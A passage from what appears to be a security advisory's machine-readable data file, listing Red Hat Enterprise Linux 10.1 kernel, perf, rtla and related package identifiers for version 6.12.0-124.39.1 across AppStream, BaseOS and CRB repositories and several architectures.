"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
